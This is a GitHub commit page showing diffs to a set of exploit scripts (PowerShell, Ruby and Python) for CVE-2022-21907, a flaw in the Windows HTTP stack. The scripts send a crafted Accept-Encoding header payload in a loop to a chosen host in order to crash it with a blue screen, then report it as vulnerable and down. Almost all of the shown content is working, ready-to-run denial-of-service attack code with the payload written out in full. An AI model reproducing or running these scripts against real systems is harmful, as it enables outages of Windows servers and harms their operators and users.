Skip to content

Commit

Permalink
[1.0.0] Metasploit, NMAP modules and pure ruby script
Browse files Browse the repository at this point in the history
 - Fix: some error in python and powershell exploit
  • Loading branch information
mauricelambert authored Mar 5, 2022
1 parent c4979f2 commit d6110d7
Show file tree
Hide file tree
Showing 8 changed files with 671 additions and 24 deletions.
10 changes: 7 additions & 3 deletions CVE-2022-21907.ps1
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
###################
###################
# This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
# Copyright (C) 2022 Maurice Lambert

Expand Down Expand Up @@ -30,7 +30,7 @@ This is free software, and you are welcome to redistribute it
under certain conditions.
"@

write $copyright
write "`n$copyright`n"

$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
$session.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.62"
Expand All @@ -55,5 +55,9 @@ $headers = @{

$ErrorActionPreference="Stop"
while(1) {
Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers
try {
Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers -TimeoutSec 10
} catch {
break
}
}
161 changes: 161 additions & 0 deletions CVE-2022-21907.rb
Original file line number Diff line number Diff line change
@@ -0,0 +1,161 @@
#!/usr/bin/env ruby
# frozen_string_literal: true

##
# This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
# attack (Blue Screen).

###################
# This script exploit the CVE-2022-21907 for a DOS attack.
# Copyright (C) 2022 Maurice Lambert

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
###################

##
# Project version
VERSION = '1.0.0'

##
# Project author
AUTHOR = 'Maurice Lambert'

##
# E-mail of the author of the project
AUTHOR_EMAIL = '[email protected]'

##
# Project maintainer
MAINTAINER = 'Maurice Lambert'

##
# E-mail of the maintainer of the project
MAINTAINER_EMAIL = '[email protected]'

##
# Project description
DESCRIPTION = '
This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
attack (Blue Screen).
'

##
# Project license
LICENSE = 'GPL-3.0 License'

##
# Project url
URL = 'https://github.com/mauricelambert/CVE-2022-21907'

##
# Project copyright
COPYRIGHT = '
CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
'

puts "#{COPYRIGHT}\n"

require 'net/http'

##
# This class implements methods to exploit
# the CVE-2022-21907 for a DOS (Denial of Service)
# attack (Blue Screen) with ruby.
class CVE202221907
##
# This function gets target host from the STDIN

def self.get_stdin_host
print 'Host (target): '
gets.strip
end

##
# This function generates a random string

def self.generate_random_string(size)
upper_characters = Array('A'..'Z')
Array.new(size) { upper_characters.sample }.join
end

##
# This function generates a random payload

def self.generate_encoding_payload
"#{generate_random_string(24)},#{generate_random_string(60)}&" \
"#{generate_random_string(2)}&**" \
"#{generate_random_string(20)}**#{Array('A'..'Z').sample}," \
"#{generate_random_string(73)},#{generate_random_string(71)}" \
",#{generate_random_string(27)},****************************" \
"#{generate_random_string(6)}, *, ,"
end

##
# This function checks the target state

def self.check_up(request, uri)
res = Net::HTTP.start(
uri.hostname, uri.port,
read_timeout: 60,
open_timeout: 60,
use_ssl: uri.scheme == 'https'
) { |http| http.request(request) }
rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError
puts '[!] This host is probably inaccessible'
2
else
nil
end

##
# The main function to launch the attack

def self.main
host = ARGV[0] || get_stdin_host

uri = URI("http://#{host}")
request = Net::HTTP::Get.new(uri)

access_error = check_up(request, uri)
return access_error if access_error

request['Accept-Encoding'] = generate_encoding_payload
vulnerable = false

10.times do
Net::HTTP.start(
uri.hostname, uri.port,
read_timeout: 10,
open_timeout: 10,
use_ssl: uri.scheme == 'https'
) { |http| http.request(request) }
rescue Net::OpenTimeout, Errno::ETIMEDOUT
vulnerable = true
break
end

if vulnerable
puts "[+] Target: #{host} is vulnerable and down."
0
else
puts "[-] Target: #{host} is not vulnerable and up."
1
end
end
end

exit(CVE202221907.main) if __FILE__ == $PROGRAM_NAME
37 changes: 21 additions & 16 deletions CVE202221907.py
Original file line number Diff line number Diff line change
Expand Up @@ -51,35 +51,40 @@

print(copyright)

from urllib.error import URLError, HTTPError
from urllib.request import Request, urlopen
from sys import exit, stderr
from sys import exit, stderr, argv
from socket import timeout

host = input("Target: ")
host = argv[1] if len(argv) == 2 else input("Target: ")

headers = {
"Accept-Encoding": 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
"Accept-Encoding": "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,"
}

try:
response = urlopen(f"http://{host}")
except (URLError, HTTPError) as e:
urlopen(f"http://{host}")
except HTTPError:
pass
except Exception as e:
print(f"http://{host} is not DOWN.")
print(f"{e.__class__}: {e}", file = stderr)
print(f"[!] http://{host} is not UP (get no response).")
print(f"{e.__class__.__name__}: {e}", file=stderr)
exit(1)

print(f"http://{host} is not UP. Start hacking...")
print(f"[+] http://{host} is UP. Send payload...")

while True:
try:
response = urlopen(Request(f"http://{host}", headers=headers))
except TimeoutError as e:
print(f"http://{host} is not DOWN. {host} is vulnerable to CVE-2022-21907.")
exit(0)
except (URLError, HTTPError) as e:
pass
urlopen(Request(f"http://{host}", headers=headers))
except (timeout, TimeoutError, URLError):
print(
f"[+] http://{host} is DOWN. {host} is vulnerable to CVE-2022-21907."
)
exit(0)
except HTTPError:
pass
except Exception as e:
print(f"{e.__class__}: {e}")
print(f"{e.__class__.__name__}: {e}", file=stderr)

print(f"Payload sent successfully. Try new request...")
print("[!] Host is up.", file=stderr)
print("[+] Payload sent successfully. Try new request...")
Loading

0 comments on commit d6110d7

Please sign in to comment.